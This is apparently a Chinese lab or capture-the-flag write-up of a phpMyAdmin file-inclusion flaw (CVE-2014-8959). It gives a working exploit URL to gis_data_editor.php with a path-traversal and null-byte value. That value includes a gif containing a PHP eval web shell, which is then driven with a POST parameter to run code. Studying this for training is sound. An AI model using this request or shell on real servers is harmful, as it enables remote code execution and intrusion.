phpmyadmin 文件包含(CVE-2014-8959)
目录
漏洞描述
1.攻击机配置go环境:
2.点击“数据库”抓包token值
3.拿到flag:
漏洞描述
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 访问http://ip:port/pma即可进入phpmyadmin。http://ip:port/下有测试账号密码,包含根目录下1.gif,其内容为:<?php@eval($_POST[a]);?>。
1.攻击机配置go环境
登陆页面 /pma/gis_data_editor.php
用户名密码登陆pmatest/pmatest
2.点击“数据库”抓包token值
3.拿到flag
http://193.168.0.45:26133/pma/gis_data_editor.php?token=9f2b0206507afb8de01d4197bfa90a37&&gis_data[gis_type]=/../../../../1.gif%00
a=phpinfo();